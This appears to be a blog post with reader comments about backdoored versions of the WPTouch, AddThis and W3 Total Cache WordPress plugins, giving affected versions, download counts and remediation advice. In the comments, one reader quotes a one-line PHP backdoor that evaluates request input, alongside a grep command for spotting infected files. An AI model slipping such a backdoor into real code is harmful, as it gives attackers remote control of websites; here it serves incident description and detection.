Notice that you can’t get access to the forums or trac? Can’t commit a plugin or theme? Yesterday Matt announced that WordPress had force reset all WordPress passwords due to a security breach. Three popular plugins – WPTouch, AddThis and W3 Total Cache - were found to contain backdoor trojans. These were not added by the plugin developers themselves whose own WordPress accounts were compromised and new versions of the plugins were uploaded.
Let’s Look at The Scale of the Problem
A quick look at the stats in the WordPress repository gives an indication of quite how big the potential problem is:
Aaron at AddThis has said on his blog that the offending plugin is 2.1.3 if it was downloaded on 20th or 21st June. It was downloaded 3,583 times yesterday. Here’s how many people are currently using 2.1.3:
The affected versions of WPTouch are 1.9.27 and 1.9.28 – again only if you updated in the past few days. It was downloaded 14,670 times yesterday. Here’s how many people are using those versions:
I can’t find which version of W3 Total Cache is affected but from the uploads on it’s trac page it looks like 0.9.2.2 (please correct me if that’s wrong!). Again check your dates. It was downloaded 3,442 times yesterday.
Again, I really want to stress that the real issue is with plugins updated or downloaded on 20th or 21st June. Personally I struggle to remember what I’ve done over the past few days so to be safe I would update these plugins – it’s always good to be up-to-date anyway.
What Should I Do?
- Don’t panic or fire off angry emails
- Upgrade these plugins immediately- they all have new versions which will fix the exploit
- Change all of your passwords
To keep up to date you can watch out on the WordPress News blog which tends to have all of the latest, most important, WordPress happenings.
I can confirm, having 2 of these plugins installed, that I had a trojan set itself up cozy in my server last week, and I spent about a day cleansing it.
The effected files, in my case, were all index.php files, with the classic “eval(base64_decode(” code, which inserted “<iframe" codes at the start of all web pages.
From your web root, you can run this command to see if it has crept into any files:
find . -exec grep "eval(base64_decode" '{}' \; -print, but the real source was probably another file with code like this:<?php if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));Well the biggest worrying questions in my opinion are: 1. How did that happen in the first place?
2. How did the hackers manage to insert that code in 3 different plugins almost all in once?
3. How to prevent that from happening again to other plugins?
Can you clarify what “change all your passwords” means? Like system passwords, admin passwords, the users’ passwords?
Which are vulnerable?
The more immediate question is surely:
How many other plugins have been affected but we don’t know about it yet?
Have they done a repository scan to ensure it is really only these three plugins? Or how can we be sure that it is only these three plugins?
Indeed, this exploit has been documented for WP-phpMyAdmin (and perhaps other installations of phpMyAdmin or phpPgAdmin). It’s a good idea to scan your files, as I showed above, if you suspect anything.
Thank’s for share bro…
:D
Nice info…
Your’s tips is nice..